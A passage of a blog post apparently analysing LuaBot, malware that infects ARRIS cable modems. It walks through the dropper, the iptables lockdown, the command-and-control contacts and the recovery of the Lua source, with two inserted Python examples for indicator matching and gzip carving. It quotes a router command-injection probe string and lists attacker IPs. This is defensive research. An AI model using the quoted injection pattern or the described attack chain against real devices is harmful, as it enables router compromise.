inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-DWytLE0AsEQ/V5QcHTuwvOI/AAAAAAAABXY/H72vWoBt0FIJIAoXJAK0D9ZBFCIx5o90gCLcB/s1600/top-honeypot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="320" src="https://2.bp.blogspot.com/-DWytLE0AsEQ/V5QcHTuwvOI/AAAAAAAABXY/H72vWoBt0FIJIAoXJAK0D9ZBFCIx5o90gCLcB/s320/top-honeypot.PNG" width="294" /></span></a></div><div><br /></div><div><span style="font-family: inherit;">The initial dropper is created by echoing shell commands to the terminal to create a standard 
ARM ELF.</span></div><div><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-9NrPnroOPS0/V5Odxuo5cHI/AAAAAAAABW8/WosvOLpOC4oA0dyXFKwcLwDT6VA3Rz6hwCLcB/s1600/dropper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="251" src="https://3.bp.blogspot.com/-9NrPnroOPS0/V5Odxuo5cHI/AAAAAAAABW8/WosvOLpOC4oA0dyXFKwcLwDT6VA3Rz6hwCLcB/s640/dropper.png" width="640" /></span></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I have cross-compiled and uploaded a few debugging tools to my&nbsp;<a href="https://github.com/bmaia/cross-utils/tree/master/armeb">cross-utils</a>&nbsp;repository, including <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a>, <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/strace">strace</a> and <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/tcpdump">tcpdump</a>. I also happen to have a vulnerable ARRIS TG862, so I can perform dynamic analysis in a controlled environment.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:</span><span style="font-family: inherit;"><br /></span><br /><div class="code">./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop</div><div class="code">connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device) </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The command is a simple download-and-exec ARMEB shellcode. 
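As an added example (not part of the original post or of the cross-utils repository), here is a small Python checker that pulls the AF_INET connect() destinations out of a strace -v trace like the network.txt above and flags the ones matching the indicators listed in this post's IOC section: the dropper/CnC IPs and the /24 ranges the attacker whitelists in iptables. The first sample line is the real one shown above; the other two are constructed.

```python
import ipaddress
import re

# Indicators taken from the IOC section of this post.
DROPPER_AND_CNC_IPS = {"46.148.18.122", "80.87.205.92"}
ATTACKER_WHITELISTED_RANGES = [ipaddress.ip_network(n) for n in (
    "46.148.18.0/24", "185.56.30.0/24", "217.79.182.0/24",
    "85.114.135.0/24", "95.213.143.0/24", "185.53.8.0/24",
)]

# Shape of the connect() records strace -v prints for AF_INET sockets.
CONNECT_RE = re.compile(
    r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
    r'sin_addr=inet_addr\("([\d.]+)"\)\}, \d+\)'
)

def parse_connects(strace_output):
    """Yield (ip, port) for every AF_INET connect() found in the trace text."""
    for line in strace_output.splitlines():
        m = CONNECT_RE.search(line)
        if m:
            yield m.group(2), int(m.group(1))

def classify(ip):
    """Return a reason string if ip matches an indicator, else None."""
    if ip in DROPPER_AND_CNC_IPS:
        return "known dropper/CnC IP"
    addr = ipaddress.ip_address(ip)
    for net in ATTACKER_WHITELISTED_RANGES:
        if addr in net:
            return f"inside attacker-whitelisted range {net}"
    return None

def find_ioc_hits(strace_output):
    """List (ip, port, reason) for each outbound connection that matches an indicator."""
    hits = []
    for ip, port in parse_connects(strace_output):
        reason = classify(ip)
        if reason:
            hits.append((ip, port, reason))
    return hits

# Constructed sample trace: line 1 is the real record from the post,
# lines 2 and 3 are made up (8.8.8.8 is the resolver .sox configures, not an IOC).
SAMPLE_TRACE = """\
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)
connect(7, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
connect(8, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("185.56.30.7")}, 16) = 0
"""

if __name__ == "__main__":
    for ip, port, reason in find_ioc_hits(SAMPLE_TRACE):
        print(f"{ip}:{port} -> {reason}")
```

Feed it the real network.txt with `find_ioc_hits(open("network.txt").read())`; the known-IP check runs before the range check, so 46.148.18.122 is reported as the dropper IP rather than merely as part of 46.148.18.0/24.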
The malicious IP 46.148.18.122 is known for </span><a href="https://www.abuseipdb.com/check/46.148.18.122" style="font-family: inherit;">bruteforcing SSH servers and trying to exploit Linksys router command injections</a><span style="font-family: inherit;"> in the wild. After downloading the second stage malware, the script will echo the following string:</span><br /><div class="code">echo -e 61\\\\\\x30ck3r </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while&nbsp;</span><a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/" style="font-family: inherit;">Observing Large-Scale Router Exploit Attempts</a><span style="font-family: inherit;">:</span><br /><div class="code">cmd=cd /var/tmp &amp;&amp; echo -ne \\x3610cker &gt; 610cker.txt &amp;&amp; cat 610cker.txt </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules&nbsp;</span>allowing remote access from very specific subnets and&nbsp;<span style="font-family: inherit;">blocking external access to ports 8080, 80, 433, 23 and 22:</span></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-P5BjHuqxlL4/V5VdZa5Y-xI/AAAAAAAABXw/nsilESC1atAcJt7PDcsNFV48_mCiozg0ACLcB/s1600/iptables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://2.bp.blogspot.com/-P5BjHuqxlL4/V5VdZa5Y-xI/AAAAAAAABXw/nsilESC1atAcJt7PDcsNFV48_mCiozg0ACLcB/s640/iptables.png" width="640" /></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">These rules block external exploit attempts to ARRIS services/backdoors, 
restricting access to networks controlled by the attacker.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">After setting up the rules, two additional binaries were transferred/started by the attacker. The first one, .sox.rslv (</span>889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on <a href="https://github.com/wongsyrone/shadowsocks-libev-libsodium-for-server/tree/master/libudns">udns 0.4</a>.</div><div><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-QIz47ByOgYA/V9TLWGdxjnI/AAAAAAAABdc/m895J_BthuEq1Lw5mwldLMDj80u1pbvMgCLcB/s1600/udns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://3.bp.blogspot.com/-QIz47ByOgYA/V9TLWGdxjnI/AAAAAAAABdc/m895J_BthuEq1Lw5mwldLMDj80u1pbvMgCLcB/s400/udns.png" width="400" /></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The other binary, .sox (</span>4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.</div><div><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-fhTh0tBqQkY/V9Ta5BHly-I/AAAAAAAABeE/JhzTZ9beJokn2kRArqp9HwUcC3QeludtQCLcB/s1600/dns2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://3.bp.blogspot.com/-fhTh0tBqQkY/V9Ta5BHly-I/AAAAAAAABeE/JhzTZ9beJokn2kRArqp9HwUcC3QeludtQCLcB/s640/dns2.PNG" width="640" /></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Parts of the code resemble some&nbsp;<a href="http://code.taobao.org/p/sss-libev/src/trunk/shadowsocks-libev-master/">shadowsocks-libev</a>&nbsp;functionalities and there's an 
interesting reference to the <a href="https://www.threatcrowd.org/domain.php?domain=whrq.net">whrq[.]net domain</a>,&nbsp;which seems to be used as a dnscrypt gateway:</span><br /><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-zjS8g4oJiUI/V9TfxlHAb7I/AAAAAAAABes/axG66dVSxBgvolIZVWitxnK0OlCK0XlSgCLcB/s1600/whrq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://1.bp.blogspot.com/-zjS8g4oJiUI/V9TfxlHAb7I/AAAAAAAABes/axG66dVSxBgvolIZVWitxnK0OlCK0XlSgCLcB/s400/whrq.png" width="400" /></a></div><br /><strike>All these binaries&nbsp;are used as auxiliary tools</strike> for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.<br /><br /><span style="font-family: inherit;"><b>UPDATE:&nbsp;</b>According to <a href="https://medium.com/@x0rz/interview-with-the-luabot-malware-author-731b0646fc8f">this interview</a> with the supposed malware author, "<i>reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. 
My bot never had any binary modules and always is one big elf file and sometimes only small &lt;1kb size dropper</i></span>"<br /><div><br /></div></div><div><br /></div><div><b><span style="font-family: inherit;">Final Stage: LuaBot</span></b><br /><b><span style="font-family: inherit;"><br /></span></b>The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available on my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">cross-utils</a>&nbsp;repository.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ysTcZMAJoVg/V5WWizi8nCI/AAAAAAAABYI/hn7fPLQUTt8Mn9EISr9v37dXmG-RSZ6cQCLcB/s1600/comment.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://3.bp.blogspot.com/-ysTcZMAJoVg/V5WWizi8nCI/AAAAAAAABYI/hn7fPLQUTt8Mn9EISr9v37dXmG-RSZ6cQCLcB/s400/comment.png" width="400" /></a></div><br />If we use strace to perform a dynamic analysis, we can see the greeting from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot will start listening on port 11833 (TCP) and will try to contact the command and control server at 80.87.205.92.</div><div><br /><script src="https://gist.github.com/bmaia/a3f976bb608d1212d9b955f46fe85014.js"></script> <br />In order to understand how the malware works, let's combine some static and dynamic analysis. 
Time to analyse the binary using IDA Pro and...<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-YRG4NP8Yfm8/V5WaGxe2dvI/AAAAAAAABYc/R3bW2HMDIgg3pT5Hg62tQJCBwcSOyw6pwCLcB/s1600/confused-ida.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://2.bp.blogspot.com/-YRG4NP8Yfm8/V5WaGxe2dvI/AAAAAAAABYc/R3bW2HMDIgg3pT5Hg62tQJCBwcSOyw6pwCLcB/s400/confused-ida.gif" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Reversing stripped binaries<br /><br /></td></tr></tbody></table>The binaries are stripped and IDA Pro's&nbsp;F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use&nbsp;<a href="https://github.com/joxeankoret/diaphora">@matalaz</a>'s <a href="https://github.com/joxeankoret/diaphora">diaphora</a> diffing plugin to port all the symbols.<br /><br />First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain <a href="https://github.com/bmaia/cross-utils/blob/master/armeb/puma5_toolchain/armeb-linux.tar.xz">here</a> and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.<br /><br />When it finishes, close the current IDA database and open the binary arm_puma5. 
Rerun the diaphora.py script and now choose a SQLite database to diff against:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-8gkrQVDGrCw/V5bEFgnJNZI/AAAAAAAABY0/s7lqZos7DXEl7WcdGtEOprG0f7bBdmZUQCLcB/s1600/diaphora1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://3.bp.blogspot.com/-8gkrQVDGrCw/V5bEFgnJNZI/AAAAAAAABY0/s7lqZos7DXEl7WcdGtEOprG0f7bBdmZUQCLcB/s400/diaphora1.png" width="400" /></a></div><br />After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.<br /><br />Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now move to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VZbrcROHIFs/V5bXrD7FmkI/AAAAAAAABZg/KbrLVZPBGzk0D4Z7b5_VuLnziKt5yOVeACLcB/s1600/diaphora-partialmatches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://4.bp.blogspot.com/-VZbrcROHIFs/V5bXrD7FmkI/AAAAAAAABZg/KbrLVZPBGzk0D4Z7b5_VuLnziKt5yOVeACLcB/s400/diaphora-partialmatches.png" width="400" /></a></div><br />The IDA strings window exhibits lots of information related to the Lua scripting language. 
For this reason, I also <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/lua">cross-compiled Lua to ARMEB</a>, loaded the "lua" binary into IDA Pro and repeated the diffing process with <a href="https://github.com/joxeankoret/diaphora">diaphora</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-plEs6N4Uu70/V5beZhNKm8I/AAAAAAAABZ4/uadnfgrYFW0Fd3fdgTT7jfGkZAGZc7HCACLcB/s1600/strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://1.bp.blogspot.com/-plEs6N4Uu70/V5beZhNKm8I/AAAAAAAABZ4/uadnfgrYFW0Fd3fdgTT7jfGkZAGZc7HCACLcB/s640/strings.png" width="640" /></a></div><br />We're almost done now. If you google for some debug messages present on the code, you can find a deleted Pastebin that was cached by Google.<br /><span style="text-align: center;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TMmPWI1aNuY/V5b1EoOTa2I/AAAAAAAABaw/K2pzTDM6wiYkK71FaP29aHIIF-PB5JOOwCLcB/s1600/pastebin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="579" src="https://3.bp.blogspot.com/-TMmPWI1aNuY/V5b1EoOTa2I/AAAAAAAABaw/K2pzTDM6wiYkK71FaP29aHIIF-PB5JOOwCLcB/s640/pastebin.png" width="640" /></a></div><span style="text-align: center;"><br /></span><span style="text-align: center;">I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? 
Diffing again =)</span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-pQNG4ThNExM/V5bx8j1oXsI/AAAAAAAABaU/TXUdIM2Q6OgfPHBLP6HkYt492uJeUrwOgCLcB/s1600/evs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://3.bp.blogspot.com/-pQNG4ThNExM/V5bx8j1oXsI/AAAAAAAABaU/TXUdIM2Q6OgfPHBLP6HkYt492uJeUrwOgCLcB/s400/evs.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-O5UjSOyjCgg/V5byA-ozXVI/AAAAAAAABaY/yRTMDTSD9zI0mSy4AsHN21ZYf_YvctnkwCLcB/s1600/evs-compile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="438" src="https://1.bp.blogspot.com/-O5UjSOyjCgg/V5byA-ozXVI/AAAAAAAABaY/yRTMDTSD9zI0mSy4AsHN21ZYf_YvctnkwCLcB/s640/evs-compile.png" width="640" /></a></div><br />Reversing the malware is way more legible now. There's a builtin Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Wt0xwQFgiqs/V9YXisrr08I/AAAAAAAABfw/TA2lJWLRE68ZtuFraREzZonj7MXrOLk7wCLcB/s1600/botnet_commands.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-Wt0xwQFgiqs/V9YXisrr08I/AAAAAAAABfw/TA2lJWLRE68ZtuFraREzZonj7MXrOLk7wCLcB/s400/botnet_commands.png" width="181" /></a></div><br />The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the Command and Control server. 
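Because the code the bot unpacks at start-up is shipped inside the ELF as a GZIP member (and sits decompressed in the heap afterwards), an analyst can carve it straight out of the binary or out of a memory dump without a debugger. The following Python carver is an added example, not code from this post or from LuaBot: it scans for the gzip magic, reads the header's mtime field, and only reports offsets that actually decompress to a complete member, so stray magic bytes are skipped. The sample blob, its layout and its Lua snippet are constructed stand-ins; the mtime used for the sample is the one from the real header, assumed to be UTC.

```python
import gzip
import io
import struct
import zlib
from datetime import datetime, timezone

GZIP_MAGIC = b"\x1f\x8b\x08"  # ID1, ID2, CM = deflate

def carve_gzip_members(blob):
    """Return [(offset, mtime_utc_or_None, payload)] for every complete gzip member in blob."""
    members = []
    off = blob.find(GZIP_MAGIC)
    while off != -1:
        # Fixed 10-byte header: ID1 ID2 CM FLG MTIME(4, little endian) XFL OS
        if off + 10 <= len(blob):
            mtime = struct.unpack_from("<I", blob, off + 4)[0]
            d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # +16: expect a gzip wrapper
            try:
                payload = d.decompress(blob[off:])
            except zlib.error:
                payload = None  # the magic bytes were a false positive
            if payload is not None and d.eof:
                when = datetime.fromtimestamp(mtime, tz=timezone.utc) if mtime else None
                members.append((off, when, payload))
                # Resume scanning right after this member's trailer.
                off = blob.find(GZIP_MAGIC, len(blob) - len(d.unused_data))
                continue
        off = blob.find(GZIP_MAGIC, off + 1)
    return members

def build_sample():
    """Constructed stand-in for a firmware image or heap dump: ELF-ish filler,
    a stray gzip magic that is not a real member, then one genuine member."""
    lua_src = b"-- constructed sample, not LuaBot code\nlocal cfg = { port = 11833 }\n"
    ts = int(datetime(2016, 4, 18, 17, 35, 34, tzinfo=timezone.utc).timestamp())
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=ts) as gz:
        gz.write(lua_src)
    stray = GZIP_MAGIC + b"\x00" * 7 + b"garbage!"  # valid header, invalid deflate block
    blob = b"\x7fELF" + b"\x00" * 60 + stray + b"\x00" * 16 + buf.getvalue() + b"\x00" * 8
    return blob, lua_src, ts

if __name__ == "__main__":
    blob, _, _ = build_sample()
    for off, when, payload in carve_gzip_members(blob):
        print(f"gzip member at 0x{off:X}, mtime {when}, {len(payload)} bytes:")
        print(payload.decode())
```

Against the real sample you would call `carve_gzip_members(open("arm_puma5", "rb").read())` and expect a hit at 0xA40B8; the same function works on a dump such as arm_puma5-heap.mem. Checking `d.eof` rather than trusting the magic alone is what keeps random 1f 8b 08 sequences in code or data from being reported as packed scripts.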
The malware author packed the Lua source code as a GZIP blob, making the whole reversing job easier for us, as we don't have to deal with Lua Bytecode.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-lu-zbER9ock/V9YZcesFzAI/AAAAAAAABf8/vSyY9TTBr2A2yqkx6ZqK91HkEbJSHd5eQCLcB/s1600/gz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://4.bp.blogspot.com/-lu-zbER9ock/V9YZcesFzAI/AAAAAAAABf8/vSyY9TTBr2A2yqkx6ZqK91HkEbJSHd5eQCLcB/s640/gz.png" width="640" /></a></div><br />The blob at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dVhuWtwyUhA/V9YZtjrj8lI/AAAAAAAABgE/z8tnRYSazTgLQ2W9Fkhxkp-CUmGQGly6gCLcB/s1600/gz_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://1.bp.blogspot.com/-dVhuWtwyUhA/V9YZtjrj8lI/AAAAAAAABgE/z8tnRYSazTgLQ2W9Fkhxkp-CUmGQGly6gCLcB/s640/gz_header.png" width="640" /></a></div><br />Another easy way to unpack the Lua code is to attach your favorite debugger (<a href="https://github.com/hugsy/gef">gef</a>, of course) to the running binary and dump the process memory (heap).<br /><br />First, copy <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a> to the cable modem, run the malware (arm_puma5) and attach the debugger to the respective PID:<br /><div class="code">./gdbserver --multi localhost:12345 --attach 1058 </div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-2eYAAdYzNtA/V9T2klPdjiI/AAAAAAAABfI/_5XPd_dpCsMpJ5jAowYDGavdt-cKqA6aQCLcB/s1600/gef1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" 
src="https://3.bp.blogspot.com/-2eYAAdYzNtA/V9T2klPdjiI/AAAAAAAABfI/_5XPd_dpCsMpJ5jAowYDGavdt-cKqA6aQCLcB/s400/gef1.png" width="400" /></a></div><br />Then, start gef/GDB and attach it to the running server:<br /><div class="code">gdb-multiarch -q<br />set architecture arm<br />set endian big<br />set follow-fork-mode child<br />gef-remote 192.168.100.1:12345</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TSbehu0ClXI/V9nt5YK-92I/AAAAAAAABjg/8Yz_cqc3uNUzR0UinNZ5vzLt3YbsvUGxACLcB/s1600/gef2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-TSbehu0ClXI/V9nt5YK-92I/AAAAAAAABjg/8Yz_cqc3uNUzR0UinNZ5vzLt3YbsvUGxACLcB/s400/gef2.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Lastly, list the memory regions and dump the heap:<br /><div class="code">vmmap<br />dump memory arm_puma5-heap.mem 0x000c3000 0x000df000 </div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-_ghmUhxIek8/V9T24sr6LsI/AAAAAAAABfQ/WNyzSRFib1cbefvak6b4YkEAbHIp9YfqwCLcB/s1600/gef-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://3.bp.blogspot.com/-_ghmUhxIek8/V9T24sr6LsI/AAAAAAAABfQ/WNyzSRFib1cbefvak6b4YkEAbHIp9YfqwCLcB/s400/gef-3.png" width="400" /></a></div><div><br /></div><div>That's it, now you have the full source code from the LuaBot:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-uS4N29CODuY/V9T2-tgfPsI/AAAAAAAABfU/jjf3bLCAv5Ur5ya0CI23HOp2dQz2IXxuACLcB/s1600/gef-hex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" 
src="https://4.bp.blogspot.com/-uS4N29CODuY/V9T2-tgfPsI/AAAAAAAABfU/jjf3bLCAv5Ur5ya0CI23HOp2dQz2IXxuACLcB/s640/gef-hex.png" width="640" /></a></div><div><br /></div>The LuaBot source code is composed of several modules:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TxIjFqHKSBI/V9YbX7zuLaI/AAAAAAAABgY/CICOLiBvE20hBjNERhKS-wRjfqgyfHxywCLcB/s1600/lua_file_list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://4.bp.blogspot.com/-TxIjFqHKSBI/V9YbX7zuLaI/AAAAAAAABgY/CICOLiBvE20hBjNERhKS-wRjfqgyfHxywCLcB/s400/lua_file_list.png" width="400" /></a></div><br />The bot settings, including the DNS recursor and the CnC settings, are hardcoded:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-xqhr4gKyZOE/V9YgHuR7UKI/AAAAAAAABhA/dxYB4jsnxUQPUYihYI1-Kdf1DySCTPPGwCLcB/s1600/luabot_cfg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://2.bp.blogspot.com/-xqhr4gKyZOE/V9YgHuR7UKI/AAAAAAAABhA/dxYB4jsnxUQPUYihYI1-Kdf1DySCTPPGwCLcB/s320/luabot_cfg.PNG" width="320" /></a></div><br />The code is really well documented and it includes proxy checking functions and a masscan log parser:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-20a8kaa4qIw/V9Ygrxb2_UI/AAAAAAAABhE/zft2xKza_Xw3BDm564-4VDMGRAJHWHstwCLcB/s1600/luabot_httpproxy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://1.bp.blogspot.com/-20a8kaa4qIw/V9Ygrxb2_UI/AAAAAAAABhE/zft2xKza_Xw3BDm564-4VDMGRAJHWHstwCLcB/s400/luabot_httpproxy.PNG" width="400" /></a></div><br />The bot author is seeding random with /dev/urandom (cryptographers rejoice):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://3.bp.blogspot.com/-VJhxGkwDJsE/V9Yim6_8j8I/AAAAAAAABhU/Gj8JZwrtzQIV_iD247LtdhAiB0StqWHgQCLcB/s1600/luabot_seedrandom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://3.bp.blogspot.com/-VJhxGkwDJsE/V9Yim6_8j8I/AAAAAAAABhU/Gj8JZwrtzQIV_iD247LtdhAiB0StqWHgQCLcB/s400/luabot_seedrandom.PNG" width="400" /></a></div><br />LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-i8HSkRO2CLk/V9YlltIN2II/AAAAAAAABhs/IoTTWamEAA8AIiiaDlo9NtMYioFxD6RvgCLcB/s1600/luabot_signedscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://2.bp.blogspot.com/-i8HSkRO2CLk/V9YlltIN2II/AAAAAAAABhs/IoTTWamEAA8AIiiaDlo9NtMYioFxD6RvgCLcB/s400/luabot_signedscript.PNG" width="400" /></a></div><br />Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-EK6T_yxjYNI/V9YqRNfWWAI/AAAAAAAABig/pb88FpKPHvkfYdpHtPa0w16niW-6uDYMwCLcB/s1600/luabot_shiterpreter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="https://2.bp.blogspot.com/-EK6T_yxjYNI/V9YqRNfWWAI/AAAAAAAABig/pb88FpKPHvkfYdpHtPa0w16niW-6uDYMwCLcB/s400/luabot_shiterpreter.PNG" width="400" /></a></div><br />There's a tricky function named&nbsp;checkanus.penetrate_sucuri, in what seems to be some sort of bypass for Sucuri's Denial of Service (DDoS) Protection:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-zW5f7S4q0iw/V9YnlT6kZvI/AAAAAAAABiA/VSYAiP90SSUR-3dD296qy-gw4S6F4ShgACLcB/s1600/luabot_sucuri1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" 
